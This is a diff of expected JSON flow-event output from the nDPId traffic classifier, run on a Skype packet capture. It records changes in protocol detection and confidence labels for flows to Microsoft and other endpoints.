 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969694153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":351,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969714398,"flow_last_seen":1431969731992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969714398,"flow_last_seen":1431969731992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1431969715511,"flow_last_seen":1431969755484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2618,"flow_avg_l4_payload_len":84,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1431969715511,"flow_last_seen":1431969755484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2618,"flow_avg_l4_payload_len":84,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969683081,"flow_last_seen":1431969710648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969685111,"flow_last_seen":1431969703010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":486,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969709588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":21,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969691076,"flow_last_seen":1431969708230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50080,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969692087,"flow_last_seen":1431969710209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":515,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969770694,"flow_last_seen":1431969788429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431969771806,"flow_last_seen":1431969808841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2577,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969699142,"flow_last_seen":1431969728419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":684,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969701181,"flow_last_seen":1431969719738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969701181,"flow_last_seen":1431969719738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969701181,"flow_last_seen":1431969719738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969706277,"flow_last_seen":1431969723613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":592,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00599{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969691076,"flow_last_seen":1431969717999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50079,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969683445,"flow_last_seen":1431969709776,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969675413,"flow_last_seen":1431969703766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
